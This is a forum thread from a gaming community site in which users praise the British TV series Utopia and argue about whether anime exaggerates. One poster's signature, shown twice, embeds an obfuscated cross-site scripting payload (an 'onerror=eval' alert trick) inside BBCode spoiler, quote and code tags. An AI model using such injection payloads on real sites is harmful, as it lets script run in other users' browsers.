Login to ZARP
Username: Password: Remember me

TOPIC: One of my favorite TV show.

One of my favorite TV show. 9 years 6 months ago #70050

This is Utopia
Utopia is a British crime thriller-drama action television series that debuted on Channel 4 on 15 January 2013
It is a conspiracy thriller with dark themes, please use discretion while watching it.

It's so fucking amazing, please just watch this opening scene
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
  • Thanks received: 627
I'm EMP's only friend
"Do you have to wear lip stick" - RedPowder 2016
Unable to display Google Map.
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...
Login or register to post a reply.

One of my favorite TV show. 9 years 6 months ago #70051

"British thriller drama"
"This video is not available in your country"
GG I live in England just GG
*facepalm*
  • Preditorv
  • Legendary Member
  • ZARP VIP Gold Badge
  • Thanks received: 137

One of my favorite TV show. 9 years 6 months ago #70052

Eh, after watching quite a few thriller/mystery anime, I can't really say this looks appealing to me. Looks like the characters are simple "bad cop" characters, but I might've missed something there, lol.
  • LightArrowsEXE
  • Gold Boarder
  • Grumpy old anime loli
  • Thanks received: 374

One of my favorite TV show. 9 years 6 months ago #70056

「LIGHƬΔΓΓΘШЅ.exe」 wrote:
Eh, after watching quite a few thriller/mystery anime, I can't really say this looks appealing to me. Looks like the characters are simple "bad cop" characters, but I might've missed something there, lol.

Perhaps that is because anime over-exagerate everything.
  • Zan
  • Senior Boarder
  • Thanks received: 131

One of my favorite TV show. 9 years 6 months ago #70058

The characters you see are hired assassins, hired and one created by an organisation bent on sterilizing 99% of the human race.
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
I'm EMP's only friend
[spoiler=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]]'throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13][/spoiler][quote=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]+a[13]][code=throw/a/,Uncaught=1,g=alert,a=URL+0,onerror=eval,/1/g+a[12]+[1337]...

One of my favorite TV show. 9 years 6 months ago #70060

Zan wrote:
Perhaps that is because anime over-exagerate everything.

Thanks for assuming something so baseless. It proves a lot about how people like you think about media. Anime that over-exaggerate are few and far between. The only examples I can think of (from around 300 titles) are Tengen Toppa Gurren Lagann and Kill la Kill, and depending on how you see it, Kore wa Zombie Desu ka? can be put there aswell.
soxey6 wrote:
The characters you see are hired assassins, hired and one created by an organisation bent on sterilizing 99% of the human race.

Thanks for the explanation.
  • LightArrowsEXE
  • Gold Boarder
  • Grumpy old anime loli
Last Edit: 9 years 6 months ago by LightArrowsEXE.

One of my favorite TV show. 9 years 6 months ago #70061

What's that about anime being tame? I can't hear you over shit-tones of over-exaggerating animes.

Animes are well known for over-exaggerating because most of them do (In comparison to western media)
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
I'm EMP's only friend
The following user(s) said Thank You: Spyderr

One of my favorite TV show. 9 years 6 months ago #70066

10/ fucking 10 I think that this shows writing cinematography and soundtrack are 100% steller I binge watched this hard core about a month ago and its still stuck in my mind since.

to anyone reading htis and has seen/enjoyed breaking bad I highly highly recommend
  • 0ctocat
  • Senior Boarder
  • ZARP VIP
  • Flavour Text
  • Thanks received: 97

One of my favorite TV show. 9 years 6 months ago #70067

0ctocat wrote:
10/ fucking 10 I think that this shows writing cinematography and soundtrack are 100% steller I binge watched this hard core about a month ago and its still stuck in my mind since.

to anyone reading htis and has seen/enjoyed breaking bad I highly highly recommend
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
I'm EMP's only friend

One of my favorite TV show. 9 years 6 months ago #70080

Just wondering Soxey, but how many anime have you watched in order to come to that conclusion? I won't deny there are more anime than the ones I mentioned (because as I said, those were the ones I could think of from the top of my head), but what you guys are basically saying right now is that every anime exaggerates. I highly suggest you actually go out and watch anime instead of putting down statements about how well you know anime.
  • LightArrowsEXE
  • Gold Boarder
  • Grumpy old anime loli
The following user(s) said Thank You: kristofferson

One of my favorite TV show. 9 years 6 months ago #70087

「LIGHƬΔΓΓΘШЅ.exe」 wrote:
Just wondering Soxey, but how many anime have you watched in order to come to that conclusion? I won't deny there are more anime than the ones I mentioned (because as I said, those were the ones I could think of from the top of my head), but what you guys are basically saying right now is that <strong>every</strong> anime exaggerates. I highly suggest you actually go out and watch anime instead of putting down statements about how well you know anime.

I never said All I said most. Some anime's are like vampire night, you don't see the "wtf Japan" until the end, most though, like oraun high shove it your fucking face within the first episode.

There will always be a cultural gap. But anime is as varied as the zarp community.
  • kristofferson
  • Gold Boarder
  • ZARP VIP
  • 420 Blaz It Son
I'm EMP's only friend
The following user(s) said Thank You: LightArrowsEXE

One of my favorite TV show. 9 years 6 months ago #70104

soxey6 wrote:
What's that about anime being tame? I can't hear you over shit-tones of over-exaggerating animes.

Animes are well known for over-exaggerating because most of them do (In comparison to western media)

^ This implies you are talking about every anime out there. Anyways, I don't see this going anywhere so I suggest we drop it and stop going off-topic on this thread. Feel free to add me if you ever feel like having another heated debate over anime, lol.
  • LightArrowsEXE
  • Gold Boarder
  • Grumpy old anime loli

One of my favorite TV show. 9 years 6 months ago #70107

「LIGHƬΔΓΓΘШЅ.exe」 wrote:
Anyways, I don't see this going anywhere so I suggest we drop it and stop going off-topic on this thread. Feel free to add me if you ever feel like having another heated debate over anime, lol.

Thankyou
  • Zan
  • Senior Boarder
  • Thanks received: 131

One of my favorite TV show. 9 years 6 months ago #70108

「LIGHƬΔΓΓΘШЅ.exe」 wrote:
soxey6 wrote:

^ This implies you are talking about every anime out there. Anyways, I don't see this going anywhere so I suggest we drop it and stop going off-topic on this thread. Feel free to add me if you ever feel like having another heated debate over anime, lol.

• Studio Banter
  • Marvelous Boarder
  • ZARP VIP
  • ❤️
  • Thanks received: 5848

One of my favorite TV show. 9 years 6 months ago #70109

I_am_the_Walrus wrote:
  • LightArrowsEXE
  • Gold Boarder
  • Grumpy old anime loli